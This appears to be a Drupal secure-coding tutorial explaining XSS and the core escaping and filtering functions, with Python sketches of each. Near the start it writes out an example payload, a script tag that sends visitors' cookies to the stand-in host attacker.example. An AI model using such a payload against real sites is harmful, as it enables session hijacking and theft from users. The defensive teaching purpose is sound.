So… you need to write some code that collects data from somewhere (user input, the database, or some external source) and displays it on your Drupal website as HTML output (for example, in a custom block or page).
What is XSS and how critical is it?
OK… first things first: what is XSS? A cross-site scripting (XSS) vulnerability enables attackers to inject client-side scripts into web pages viewed by other users (the victims). From there, an attacker can hijack user sessions, deface websites, insert hostile content, redirect users, take over the user's browser with malware, and more.
As stated by OWASP:
“You are vulnerable if you do not ensure that all user supplied input is properly escaped, or you do not verify it to be safe via input validation, before including that input in the output page.”
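To make the OWASP description concrete, here is a minimal sketch of the vulnerable pattern: user-supplied text concatenated straight into HTML. It is written in Python purely for illustration (Drupal itself is PHP), and the render_comment_unsafe() helper and the attacker.example host are hypothetical.

```python
def render_comment_unsafe(author: str, body: str) -> str:
    # VULNERABLE (hypothetical helper): user input is concatenated into HTML
    # without any escaping, so any markup in `body` reaches the browser intact.
    return "<div class=\"comment\"><b>" + author + "</b>: " + body + "</div>"


# A typical payload: when this string is rendered, the victim's browser runs
# the script and sends their cookies to a made-up attacker-controlled host.
payload = "<script>new Image().src='https://attacker.example/?c='+document.cookie</script>"

html_out = render_comment_unsafe("mallory", payload)
print(html_out)
```

Every page view that includes html_out would run the script in the viewer's browser. Escaping the values before they are concatenated is what prevents this.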
It is estimated that about 82% of applications contain this vulnerability at some point.
The Drupal philosophy - Escape or filter when appropriate
Probably the most common security advice you will hear is that “you should always sanitize/validate/filter user-input data”. The problem with a content management system like Drupal is that the input is not well defined. As Drupal's community documentation page “Handle user input with care” puts it, the solution is to apply the appropriate filter at the point where it is needed: just before sending plain text or HTML to the browser, or mixing plain text with HTML, escape it with the proper Drupal function; and when you write an SQL query, use the escaping mechanisms provided by the database API.
If you look at how data is stored in Drupal's database, you will see that it is stored exactly as entered, without any changes, and is filtered only when it is displayed.
Drupal's approach (storing possibly malicious code in the database and filtering it later) of course has pros and cons, but if developers follow the same approach in their own code, most issues can be avoided. Always keep in mind, though, that nothing is 100% secure.
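The store-raw, filter-on-output approach can be sketched with Python's built-in sqlite3 module standing in for Drupal's database layer (an assumption for illustration only; in Drupal 7 the equivalent is a placeholder query such as db_query('SELECT title FROM {node} WHERE nid = :nid', array(':nid' => $nid))). The ? placeholders let the driver handle SQL escaping, the text is stored unchanged, and html.escape() is applied only at render time.

```python
import sqlite3
from html import escape

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE node (nid INTEGER PRIMARY KEY, title TEXT)")

raw_title = "<script>alert('xss')</script> & friends"

# Store exactly what the user typed. The ? placeholder makes the driver handle
# SQL quoting, so the value can never change the structure of the query.
conn.execute("INSERT INTO node (title) VALUES (?)", (raw_title,))

stored_title = conn.execute(
    "SELECT title FROM node WHERE nid = ?", (1,)
).fetchone()[0]

# Filter only at output time, for the context being rendered
# (here: plain text placed inside an HTML page).
html_title = escape(stored_title, quote=True)
print(html_title)
```

Because the database holds the original text, the same value could later be rendered through a different filter (for example, as rich text) without losing anything.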
How to filter output data in code
In this post, we explain how to filter the different kinds of output data in your code to help protect your website from these attacks.
Image taken from the “Doing Drupal Security Right” presentation by Gábor Hojtsy (Acquia), DrupalCon London 2011.
The image summarizes the Drupal approach you should follow.
Let's start with printing data as plain text, which means printing the data as is. Any HTML tags or other special characters should be encoded so that the user sees the text exactly as it was entered, without any processing. The function to use is check_plain(), which encodes special characters (converting them to HTML entities) in a plain-text string for display as HTML, and also validates strings as UTF-8 to prevent XSS on Internet Explorer 6.
How the data appears unfiltered (before the horizontal line) and filtered (after). In the unfiltered version, the script (the alert() call) has already run and is not shown to the user as text. In an actual XSS attack, the script would run without the victim noticing.
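As a rough illustration of what check_plain() does, here is a Python sketch (check_plain_sketch is a hypothetical name, not Drupal code). It applies the same five replacements as PHP's htmlspecialchars() with ENT_QUOTES, which Drupal 7's check_plain() wraps. As an assumption about how to model the UTF-8 check, it returns an empty string when given bytes that are not valid UTF-8.

```python
from typing import Union

# The five replacements PHP's htmlspecialchars() makes with ENT_QUOTES.
_ENTITIES = {"&": "&amp;", '"': "&quot;", "'": "&#039;", "<": "&lt;", ">": "&gt;"}


def check_plain_sketch(text: Union[str, bytes]) -> str:
    """Encode special characters so the text displays literally inside HTML."""
    if isinstance(text, bytes):
        try:
            text = text.decode("utf-8")
        except UnicodeDecodeError:
            return ""  # reject invalid UTF-8 instead of passing it through
    return "".join(_ENTITIES.get(ch, ch) for ch in text)


print(check_plain_sketch("<script>alert('x')</script>"))
# prints: &lt;script&gt;alert(&#039;x&#039;)&lt;/script&gt;
```

The result is safe to place between HTML tags or inside a quoted attribute, but it is plain text: any formatting the user typed is shown literally.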
For URLs, use check_url(), which removes dangerous protocols (such as javascript:) and HTML-encodes the result. But if you intend to pass the URL as an argument to t(), l(), drupal_attributes(), or another function that will call check_plain() separately, use only drupal_strip_dangerous_protocols(), to avoid entities being encoded twice (see “Handle text in a secure fashion”).
For email addresses, both check_plain() and check_url() are solid choices (with the “mailto:” prefix, an email address is a URI).
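Protocol stripping can be sketched in Python as follows. strip_dangerous_protocols() is a simplified function modelled on the loop in Drupal 7's drupal_strip_dangerous_protocols(), and check_url_sketch() mirrors check_url() by HTML-encoding the stripped result. Both names are hypothetical, and ALLOWED_PROTOCOLS is an assumed subset of Drupal's configurable whitelist.

```python
from html import escape

# Assumed whitelist of URL schemes (a subset chosen for this example).
ALLOWED_PROTOCOLS = {"http", "https", "ftp", "mailto"}


def strip_dangerous_protocols(uri: str) -> str:
    """Repeatedly remove any leading scheme not in ALLOWED_PROTOCOLS, so that
    nested tricks like 'javajavascript:script:' are removed as well."""
    while True:
        colon = uri.find(":")
        if colon <= 0:
            return uri  # no scheme at all
        scheme = uri[:colon]
        # A '/', '?' or '#' before the colon means this is a relative URL,
        # which inherits the (safe) scheme of the current page.
        if any(c in scheme for c in "/?#"):
            return uri
        # Scheme comparison is case-insensitive.
        if scheme.lower() in ALLOWED_PROTOCOLS:
            return uri
        uri = uri[colon + 1:]  # drop the disallowed scheme and check again


def check_url_sketch(uri: str) -> str:
    """Strip dangerous protocols, then HTML-encode the result."""
    return escape(strip_dangerous_protocols(uri), quote=True)


print(check_url_sketch("mailto:jane@example.com"))
print(check_url_sketch("JaVaScRiPt:alert(1)"))
```

Passing a check_url_sketch() result to a function that escapes again would turn &amp; into &amp;amp;, which is why the stripping step alone is the right choice in that case.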
Rich Text / HTML
In other cases, you want to display the text as formatted by the user, so you need to apply filters to it. Here you have two options:
- check_markup(), which lets you pick a text format, e.g. “Filtered HTML”, and apply its filters to your text.
- filter_xss() or filter_xss_admin(), which remove characters and constructs that can trick browsers into executing XSS, and allow only a defined set of tags. The difference is that filter_xss_admin() allows almost all tags that can be used in an HTML body and is intended for admin-only use.
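To show the whitelist idea behind filter_xss(), here is a much-simplified Python sketch built on the standard library's html.parser. It is not Drupal's implementation. The tag list is an assumption modelled on filter_xss()'s defaults, every attribute except a safe href on <a> is dropped, and unclosed tags are not balanced. filter_xss_sketch, WhitelistFilter and is_safe_href are hypothetical names.

```python
from html import escape
from html.parser import HTMLParser
from typing import List, Optional, Tuple

# Assumed whitelist, modelled on the default tags of filter_xss().
ALLOWED_TAGS = {"a", "em", "strong", "cite", "blockquote", "code",
                "ul", "ol", "li", "dl", "dt", "dd"}
# Assumed set of URL schemes permitted in href attributes.
SAFE_SCHEMES = {"http", "https", "mailto"}


def is_safe_href(url: str) -> bool:
    scheme, sep, _ = url.partition(":")
    if not sep or any(c in scheme for c in "/?#"):
        return True  # relative URL: no scheme of its own
    return scheme.strip().lower() in SAFE_SCHEMES


class WhitelistFilter(HTMLParser):
    def __init__(self) -> None:
        super().__init__(convert_charrefs=True)
        self.out: List[str] = []

    def handle_starttag(self, tag: str, attrs: List[Tuple[str, Optional[str]]]) -> None:
        if tag not in ALLOWED_TAGS:
            return  # drop the tag; its text content is still kept (escaped)
        extra = ""
        href = dict(attrs).get("href") if tag == "a" else None
        if href and is_safe_href(href):
            extra = ' href="' + escape(href, quote=True) + '"'
        # All other attributes (onclick, style, ...) are discarded.
        self.out.append("<" + tag + extra + ">")

    def handle_endtag(self, tag: str) -> None:
        if tag in ALLOWED_TAGS:
            self.out.append("</" + tag + ">")

    def handle_data(self, data: str) -> None:
        # Character references were already decoded, so re-encode the text.
        self.out.append(escape(data, quote=False))


def filter_xss_sketch(text: str) -> str:
    parser = WhitelistFilter()
    parser.feed(text)
    parser.close()
    return "".join(parser.out)


print(filter_xss_sketch('<p onclick="steal()">Hi <strong>there</strong><script>alert(1)</script></p>'))
```

HTML comments and declarations are dropped too, because the parser's default handlers for them do nothing. A whitelist is used rather than a blacklist so that any tag or scheme the filter does not know about is rejected by default.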
Which one should you use? Usually, if you want to apply the more complex filters provided by Drupal's filter system, like “Convert line breaks into HTML (i.e. <br> and <p>)”, use check_markup(). But if you want to avoid loading a whole Drupal text format (and reduce execution complexity), use filter_xss().
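A text format is essentially an ordered chain of filters, and check_markup() runs the text through each of them. The Python sketch below illustrates that idea with two simplified, hypothetical filters loosely modelled on Drupal's “Plain text” format (escape all HTML, then convert line breaks). None of these names are Drupal APIs.

```python
from html import escape
from typing import Callable, List

Filter = Callable[[str], str]


def escape_html(text: str) -> str:
    """Display any HTML as plain text by encoding special characters."""
    return escape(text, quote=True)


def convert_line_breaks(text: str) -> str:
    """Much-simplified line-break filter: blank lines separate <p> paragraphs,
    single newlines inside a paragraph become <br />."""
    paragraphs = []
    for block in text.replace("\r\n", "\n").split("\n\n"):
        block = block.strip()
        if block:
            paragraphs.append("<p>" + block.replace("\n", "<br />") + "</p>")
    return "\n".join(paragraphs)


# Order matters: user HTML is neutralised first, so the <p> and <br />
# tags added afterwards by our own filter survive.
PLAIN_TEXT_FORMAT: List[Filter] = [escape_html, convert_line_breaks]


def check_markup_sketch(text: str, text_format: List[Filter]) -> str:
    for apply_filter in text_format:
        text = apply_filter(text)
    return text


print(check_markup_sketch("Hello <b>world</b>\nline two\n\nSecond paragraph",
                          PLAIN_TEXT_FORMAT))
```

Reversing the list would escape the <p> and <br /> tags the second filter just added, which is why the processing order of filters is part of a text format's configuration.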
Some functions and APIs also sanitize their input text themselves, usually by passing it through check_plain(): for example, menu item and breadcrumb titles, some Form API (FAPI) elements, and functions with placeholders. When using these, filtering the data yourself beforehand can result in double-escaped, unwanted output. See “Handle text in a secure fashion” for more information.
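Double escaping is easy to demonstrate. The sketch below is a hypothetical Python stand-in for placeholder substitution as done by t() and format_string() in Drupal 7, where @-placeholders are passed through check_plain() and !-placeholders are inserted verbatim. If you pass it a value that was already escaped, you get visible &amp;amp; artefacts.

```python
import re
from html import escape
from typing import Dict


def format_string_sketch(template: str, args: Dict[str, str]) -> str:
    """Replace placeholders in one pass: '@key' values are HTML-escaped,
    '!key' values are inserted as-is (the caller must have sanitized them)."""
    if not args:
        return template
    # Longest keys first, so '@name' is not matched inside '@names'.
    keys = sorted(args, key=len, reverse=True)
    pattern = re.compile("|".join(re.escape(k) for k in keys))

    def substitute(match: "re.Match") -> str:
        key = match.group(0)
        value = args[key]
        return escape(value, quote=True) if key.startswith("@") else value

    return pattern.sub(substitute, template)


name = "Tom & Jerry"
print(format_string_sketch("Hello @name", {"@name": name}))          # Hello Tom &amp; Jerry
print(format_string_sketch("Hello @name", {"@name": escape(name)}))  # Hello Tom &amp;amp; Jerry
```

The second call is the mistake the paragraph above warns about: the value was escaped once by hand and once more by the placeholder, so the reader sees “&amp;” on the page instead of “&”.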
Security is never enough…
Remember that this post covers only a small part of Drupal security, and that no site is ever 100% secure. But you can do a few things to avoid the most common vulnerabilities. For more security configuration advice, read “Securing your site” in Drupal's documentation, and if you are writing code for your Drupal project (or, why not, for the Drupal community), read the “Writing secure code” section.
[Image by: John Maravelakis]